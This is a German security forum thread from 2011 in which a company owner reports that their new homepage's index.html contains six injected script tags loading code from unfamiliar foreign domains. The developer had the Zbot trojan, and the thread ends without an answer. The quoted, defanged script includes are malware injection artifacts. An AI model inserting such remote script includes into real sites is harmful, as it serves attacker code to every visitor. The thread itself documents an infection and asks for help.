Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Eigene Website sendet Daten an andere Url`s (https://www.trojaner-board.de/97465-eigene-website-sendet-daten-andere-url-s.html)

Vollpfosten8 14.04.2011 15:19
Eigene Website sendet Daten an andere Url`s
 
Hi Leute,

wir haben uns von einem Webentwickler eine Firmenhomepage gestalten lassen, die noch nicht produktiv im Einsatz ist. Seit ein paar Tagen fällt mir auf, dass während man die Startseite betritt, Daten an weitere Url`s gesendet werden.
Der Aufbau dauert etwas länger als bei allen anderen Seiten und in der Statusleiste unten links steht immer "Warten auf..." und dann die fremden Url`s.
Habe daraufhin mir selbst mir die Index.html angesehen und folgende script includierungen gefunden:

<script type="text/javascript" src="hxxp://kityn.kiev.ua/js.php"></script>
<script type="text/javascript" src="hxxp://testzone.saturn.tj/js.php"></script>
<script type="text/javascript" src="hxxp://harikatatil.com/search.php"></script>
<script type="text/javascript" src="hxxp://steelborder.com/swfobject.js"></script>
<script type="text/javascript" src="hxxp://optimistbenin.com/search.php"></script>
<script type="text/javascript" src="hxxp://sieuthitructuyen.com.vn/swfobject.js">

Ich habe anschließend sofort den Entwickler verständigt und habe gerade Info bekommen, dass er den Trojaner Win32:Zbot-NAL im System hatte.

Und nun meine Fragen.
1. Hängt das eine mit dem anderem zusammen und
2. bestand hier eine Gefahr für alle PC´s die diese Seite besuchten?

Ich hoffe Ihr könnt mir schnell helfen, denn hier gehts um Firmen PC´s die diese Seite besucht hatten.


Schonmal herzlichen Dank & Gruß

Vollpfosten

cosinus 14.04.2011 15:31
Zitat:
wir haben uns von einem Webentwickler eine Firmenhomepage gestalten lassen
Dann frag mal den Webentwickler wie er Absicherungen gestaltet hat, welches CMS dahinter steckt etc.
Wenn er die Seite pflegt sollte die Sicherheit auch seine Aufgabe sein - oder wurde was anderes vereinbart (Pflichtenheft etc.)?

Vollpfosten8 14.04.2011 15:36
Hi Arne,

die weitere Pflege will ich selbst übernehmen.
CMS wird nicht verwendet.

Der Entwickler meinte ich solle erstmal nur das Passwort des FTP-Zugangs ändern. Was ich natürlich sofort gemacht habe.

Der Entwickler weiß selbst noch nicht was diese Javascript Dateien angerichtet haben.


Gruß

Vollpfosten

cosinus 14.04.2011 15:39
Ich werd mir die Links nachher mal genau ansehen...

Vollpfosten8 18.04.2011 23:02
Kann mir denn niemand weiter helfen?

cosinus 19.04.2011 19:17
Hat sich in der Zwischenzeit was neues ergeben?


Alle Zeitangaben in WEZ +1. Es ist jetzt 12:32 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131